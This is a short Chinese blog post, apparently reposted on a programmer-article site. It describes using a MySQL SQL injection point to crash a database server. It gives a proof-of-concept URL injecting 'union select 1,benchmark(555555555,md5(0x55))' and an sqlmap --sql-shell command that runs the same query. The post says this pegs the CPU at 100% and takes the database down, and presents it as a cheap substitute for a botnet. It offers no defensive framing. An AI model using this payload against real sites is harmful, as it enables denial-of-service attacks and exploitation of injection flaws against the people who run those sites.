SQLAMP DDOS宕机数据库
程序员文章站
2022-06-19 09:09:59
mysql存在注入时,可以注入sleep语句,传入一个足够大的参数,因为引擎是myisam,并且拿来操作的是会锁表的语句,会瞬间造成服务器cpu 100%
由此产生ddos,资源...
mysql存在注入时,可以注入sleep语句,传入一个足够大的参数,因为引擎是myisam,并且拿来操作的是会锁表的语句,会瞬间造成服务器cpu 100%
由此产生ddos,资源利用只是一个注入,免去了那么多的个人pc
注入点:https://www.a.com/a.php?id=1
Poc:https://www.a.com/a.php?id=1 union select 1,benchmark(555555555,md5(0×55))
之后cpu瞬间就满了,数据库宕机
Sqlmap里:
sqlmap -u https://www.a.com/a.php?id=1 –sql-shell –threads 8 sql-shell> select 1,benchmark(555555555,md5(0×55))
ok,结束,中午匆忙写的。